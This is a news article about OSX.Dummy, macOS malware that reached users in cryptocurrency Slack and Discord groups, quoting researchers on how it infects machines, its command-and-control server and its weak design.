Security researchers have discovered new malware targeting Mac owners discussing cryptocurrencies on Slack and Discord chat websites.

Security researchers have discovered new malware targeting Mac owners discussing cryptocurrencies on Slack and Discord chat websites.

 

According to security researcher Remco Verhoef, multiple MacOS malware attacks, originating within crypto related Slack or Discord chats, have been observed. Hackers have been infiltrating these groups pretending to be administrators or key people on these websites. 

 

In a Sans Institute blog post, Verhoef said that small snippets are being shared, resulting in downloading and executing a malicious binary. When the code is installed it attempts to connect to a command and control (C&C) server owned by the attackers. If the connection to the C&C server succeeds, hackers can then remotely access the Mac and run code on it. 

 

This malware also steals user passwords and stores these on the local machine.

 

“CrownCloud, a German-based provider is the owner of the block of 185.243.115.230 and the server appears to be located in the Netherlands,” said Verhoef.

 

According to a blog post by another researcher, Patrick Wardle, chief research officer and founder of Digita Security, the infection method of the malware, he has called OSX.Dummy, is “dumb”.

 

“Apparently attackers are asking users to infect themselves,” he said. He also lambasted the size of the malware, coming in at 34MB and also claimed that the persistence mechanism is “lame”, as its places code into the Launch Daemons directory.

 

“The capabilities are rather limited (and thus rather dumb), it’s trivial to detect at every step (that dumb)…and finally, the malware saves the user’s password to dumpdummy.”

 

“I guess the take away here is (yet again) the built-in macOS malware mitigations should never be viewed as a panacea.”

This article originally appeared at scmagazineuk.com



Source link

NO COMMENTS

LEAVE A REPLY